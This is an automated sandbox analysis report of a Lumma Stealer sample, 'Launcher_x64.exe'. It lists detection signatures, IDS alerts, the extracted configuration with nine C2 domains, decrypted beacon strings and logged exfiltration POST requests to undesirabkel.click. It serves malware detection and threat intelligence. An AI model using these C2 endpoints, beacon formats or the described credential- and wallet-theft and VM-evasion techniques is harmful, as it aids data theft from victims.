Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Launcher_x64.exe

Overview

General Information

Sample name:Launcher_x64.exe
Analysis ID:1582871
MD5:741ee77540764d0c3eab3f6fa16f5f37
SHA1:89db0aca9e9db4cec292b77c9592e8f10626ed11
SHA256:fdfa752ff15ceefd4337704a2f52116dc44d18f7aa2ecb775ad0540dbc3990b2
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Launcher_x64.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\Launcher_x64.exe" MD5: 741EE77540764D0C3EAB3F6FA16F5F37)
    • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Launcher_x64.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\Launcher_x64.exe" MD5: 741EE77540764D0C3EAB3F6FA16F5F37)
    • Launcher_x64.exe (PID: 7372 cmdline: "C:\Users\user\Desktop\Launcher_x64.exe" MD5: 741EE77540764D0C3EAB3F6FA16F5F37)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rabidcowse.shop", "undesirabkel.click", "tirepublicerj.shop", "cloudewahsj.shop", "noisycuttej.shop", "wholersorie.shop", "nearycrepso.shop", "abruptyopsn.shop", "framekgirus.shop"], "Build id": "LPnhqo--swetamubcoyu"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: Launcher_x64.exe PID: 7372JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Launcher_x64.exe PID: 7372JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Launcher_x64.exe PID: 7372JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            Process Memory Space: Launcher_x64.exe PID: 7372JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:37:10.285247+010020283713Unknown Traffic192.168.2.449730188.114.97.3443TCP
                2024-12-31T17:37:11.424848+010020283713Unknown Traffic192.168.2.449731188.114.97.3443TCP
                2024-12-31T17:37:12.697496+010020283713Unknown Traffic192.168.2.449732188.114.97.3443TCP
                2024-12-31T17:37:16.980147+010020283713Unknown Traffic192.168.2.449733188.114.97.3443TCP
                2024-12-31T17:37:18.395431+010020283713Unknown Traffic192.168.2.449734188.114.97.3443TCP
                2024-12-31T17:37:22.852054+010020283713Unknown Traffic192.168.2.449735188.114.97.3443TCP
                2024-12-31T17:37:26.331153+010020283713Unknown Traffic192.168.2.449736188.114.97.3443TCP
                2024-12-31T17:37:29.118021+010020283713Unknown Traffic192.168.2.449742188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:37:10.758421+010020546531A Network Trojan was detected192.168.2.449730188.114.97.3443TCP
                2024-12-31T17:37:11.867229+010020546531A Network Trojan was detected192.168.2.449731188.114.97.3443TCP
                2024-12-31T17:37:29.896418+010020546531A Network Trojan was detected192.168.2.449742188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:37:10.758421+010020498361A Network Trojan was detected192.168.2.449730188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:37:11.867229+010020498121A Network Trojan was detected192.168.2.449731188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:37:10.285247+010020585511Domain Observed Used for C2 Detected192.168.2.449730188.114.97.3443TCP
                2024-12-31T17:37:11.424848+010020585511Domain Observed Used for C2 Detected192.168.2.449731188.114.97.3443TCP
                2024-12-31T17:37:12.697496+010020585511Domain Observed Used for C2 Detected192.168.2.449732188.114.97.3443TCP
                2024-12-31T17:37:16.980147+010020585511Domain Observed Used for C2 Detected192.168.2.449733188.114.97.3443TCP
                2024-12-31T17:37:18.395431+010020585511Domain Observed Used for C2 Detected192.168.2.449734188.114.97.3443TCP
                2024-12-31T17:37:22.852054+010020585511Domain Observed Used for C2 Detected192.168.2.449735188.114.97.3443TCP
                2024-12-31T17:37:26.331153+010020585511Domain Observed Used for C2 Detected192.168.2.449736188.114.97.3443TCP
                2024-12-31T17:37:29.118021+010020585511Domain Observed Used for C2 Detected192.168.2.449742188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:37:09.693251+010020585501Domain Observed Used for C2 Detected192.168.2.4560561.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:37:16.450237+010020480941Malware Command and Control Activity Detected192.168.2.449732188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:37:26.361006+010028438641A Network Trojan was detected192.168.2.449736188.114.97.3443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://undesirabkel.click/f?Avira URL Cloud: Label: malware
                Source: undesirabkel.clickAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/apis0Avira URL Cloud: Label: malware
                Source: https://undesirabkel.click/.?Avira URL Cloud: Label: malware
                Source: https://undesirabkel.click:443/apiAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/((jAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/AAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/apiAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/Avira URL Cloud: Label: malware
                Source: https://undesirabkel.click/apiteAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/apiHAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/apiwAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/4Avira URL Cloud: Label: malware
                Source: 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["rabidcowse.shop", "undesirabkel.click", "tirepublicerj.shop", "cloudewahsj.shop", "noisycuttej.shop", "wholersorie.shop", "nearycrepso.shop", "abruptyopsn.shop", "framekgirus.shop"], "Build id": "LPnhqo--swetamubcoyu"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.8% probability
                Source: Launcher_x64.exeJoe Sandbox ML: detected
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: framekgirus.shop
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wholersorie.shop
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: undesirabkel.click
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: LPnhqo--swetamubcoyu
                Source: Launcher_x64.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D7B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00D7B799
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D7B6E8 FindFirstFileExW,2_2_00D7B6E8
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D7B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00D7B799

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058550 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click) : 192.168.2.4:56056 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49731 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49736 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49735 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49733 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49734 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49730 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49742 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49732 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49736 -> 188.114.97.3:443
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Malware configuration extractorURLs: undesirabkel.click
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: global trafficTCP traffic: 192.168.2.4:65531 -> 162.159.36.2:53
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 188.114.97.3:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GHSI1GIXNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18116Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=98XA9EBX2WNXENO8FY8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8797Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D1YXNTJVU2NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20402Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0OT5R9Y34Z1ZACQ1LYYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1270Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NTCS7LIP3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584103Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: undesirabkel.click
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: undesirabkel.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click
                Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Launcher_x64.exe, 00000003.00000003.1693935481.0000000005771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Launcher_x64.exe, 00000003.00000003.1694184499.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693935481.0000000005771000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1736461523.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1694007683.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Launcher_x64.exe, 00000003.00000003.1694007683.0000000005745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Launcher_x64.exe, 00000003.00000003.1694184499.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693935481.0000000005771000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1736461523.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1694007683.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Launcher_x64.exe, 00000003.00000003.1694007683.0000000005745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1749472584.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969150771.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1858070842.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1792574881.000000000571A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/
